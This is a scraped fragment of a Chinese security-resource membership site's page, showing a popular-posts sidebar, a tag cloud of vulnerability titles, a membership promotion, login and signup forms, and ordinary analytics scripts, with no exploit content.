class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/26/"><span class="avatar-mini"><img alt="wxf3753的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//thirdwx.qlogo.cn/mmopen/vi_32/VUQn5YokkVjLia2Kpg1YPIByias4GYwhy9StopGT43TQ5RsCC3ovicExuos0JvMfEFsPB9bcbXsOicJwr5ETriaodCQ/132" class="lazyload avatar avatar-id-26"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">12月26日 </span></item><div class="meta-right"><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>440</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-blue">4</span><a href="https://vip.bdziyi.com/54901/">韩顺平java从入门到精通视频教程(全94讲)学习笔记整理(完整清晰版)<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/2690/"><span class="avatar-mini"><img alt="kerjo的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" class="lazyload avatar avatar-id-2690"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">12月26日 </span></item><div class="meta-right"><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>370</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-green">5</span><a href="https://vip.bdziyi.com/54905/">YXcms建站系统版本1.2.7<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/763/"><span class="avatar-mini"><img alt="flycat的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/09/20240925122317570.jpg" class="lazyload avatar avatar-id-763"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">12月25日 </span></item><div class="meta-right"><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>229</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 ">6</span><a href="https://vip.bdziyi.com/54874/">小白算法集训营-大幅提升刷题量,快速逃离新手区<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/26/"><span class="avatar-mini"><img alt="wxf3753的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//thirdwx.qlogo.cn/mmopen/vi_32/VUQn5YokkVjLia2Kpg1YPIByias4GYwhy9StopGT43TQ5RsCC3ovicExuos0JvMfEFsPB9bcbXsOicJwr5ETriaodCQ/132" class="lazyload avatar avatar-id-26"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">12月26日 </span></item><div class="meta-right"><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>227</item></div></div></div></div></div></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="zib-widget widget-tag-cloud author-tag"><a href="https://vip.bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but c-green-2">龙浏览器未引用的服务路径特权升级</a><a href="https://vip.bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but c-purple-2">齿轮地理位置查询</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red-2">鼠标鼠标按钮命令注入远程</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-blue">鼠标远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-yellow">鼠标远程代码</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-green">鼠标路径遍历</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but c-purple">鼠标本地文件包含</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-red">鼠标未引用的服务路径</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but ">鼠标事件状态栏</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-blue-2">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-yellow-2">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-green-2">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but c-purple-2">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red-2">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-blue">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-yellow">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-green">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-purple">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but ">默认和弱加密</a></div></div></div></main><div class="container fluid-widget"></div><footer class="footer"><div class="container-fluid container-footer"><ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-网络安全资源大全-漏洞库"> <img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-网络安全资源大全-漏洞库" class="lazyload" style="height: 40px;"> </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a> <a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">广告合作</a></p><div class="footer-muted em09">Copyright © 2024 · <a href="https://vip.bdziyi.com">棉花糖会员站</a><p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">沪ICP备2023017240号</a></p></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信"><p> <img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫码加微信-棉花糖会员站"></p> <span class="opacity8 em09">扫码加微信</span></div></li></ul></div></footer> <script type="text/javascript">window._win = {
views: '2237',
www: 'https://vip.bdziyi.com',
uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
ver: '7.9_beta2',
imgbox: '1',
imgbox_type: 'group',
imgbox_thumbs: '1',
imgbox_zoom: '1',
imgbox_full: '1',
imgbox_play: '1',
imgbox_down: '1',
sign_type: 'modal',
signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F',
signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F',
ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
ajaxpager: '',
ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
ajax_nomore: '没有更多内容了',
qj_loading: '1',
highlight_kg: '1',
highlight_hh: '1',
highlight_btn: '1',
highlight_zt: 'enlighter',
highlight_white_zt: 'enlighter',
highlight_dark_zt: 'dracula',
upload_img_size: '3',
img_upload_multiple: '6',
upload_video_size: '30',
upload_file_size: '30',
upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
user_upload_nonce: '488af42e0d',
is_split_upload: '1',
split_minimum_size: '20',
comment_upload_img: '1'
}</script> <div class="float-right round position-bottom"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn"> <svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg><div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div> </span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p><p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p><p class="placeholder k1" style="height: 80px;"></p></div></div></div></div><div class="modal fade" id="u_sign" tabindex="-1" role="dialog"><div class="modal-dialog" role="document"><div class="sign-content"><div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-网络安全资源大全-漏洞库"></div><div class="sign zib-widget blur-bg relative"> <button class="close" data-dismiss="modal"> <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg> </button><div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-网络安全资源大全-漏洞库" class="lazyload"></div></div><div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号?立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号,立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="d0e1114113" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div></div></div></div></div><div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini" style="" role="document"><div class="modal-content"><div class="modal-body"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body><p style="color: orange;">新版现已发布,新增多项新功能及细节优化,欢迎体验</p><p style="color: blue;">独家代码审计、凌风云自助获取、IP街道级定位等功能已上线</p><p style="color: green;">网络安全从拥有一个资源大全开始!</p><p style="color: red;">现在购买仅需99元一年!续费还享八折!</p> <script defer src="https://vip.bdziyi.com/wp-content/cache/autoptimize/js/autoptimize_484fcf6d88f4cdc1383c2322e0d74667.js"></script></body></div></div></div><div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div></div></div></div> <script type="text/javascript">window.onload = function(){
setTimeout(function () {$('#modal-system-notice').modal('show');
$.cookie("showed_system_notice","showed", {path: "/",expires: 1});
}, 500)};</script> <script type="text/javascript">var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
var links = document.querySelectorAll('.item-tags a');
for (var i = 0; i < links.length; i++) {
var randomColor;
do {
var r = Math.floor(Math.random() * 128) + 128;
var g = Math.floor(Math.random() * 128) + 128;
var b = Math.floor(Math.random() * 128) + 128;
randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
} while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200
links[i].style.backgroundColor = randomColor;
}
//视频
$(document).ready(function() {
$('#xiayg').on('click', function() {
var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');
if ($videoElement.length) {
$videoElement.attr('src', 'https://api.86512.cn/api/web.php');
$videoElement[0].load();
$videoElement[0].play();
} else {
console.error('找不到视频元素');
}
});
});</script> <script type="text/javascript">(function() {
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
} else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();</script> <script type="text/javascript">console.log("数据库查询:11次 | 页面生成耗时:5845.266ms");</script> <script type="text/javascript">window.WeChatShareDate = {
appId: 'wx8c358971b57c3409',
timestamp: '1735222089',
nonceStr: 'Glszhm5lN7Wapv7B',
signature: 'c94d461db1e965e4c75b3481ec4eda6cf3960472',
url: 'https://vip.bdziyi.com/2237/',
title: '',
img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
desc: '',
}</script> <script type="text/javascript">_win.signin_wx_priority = true;</script> </body></html>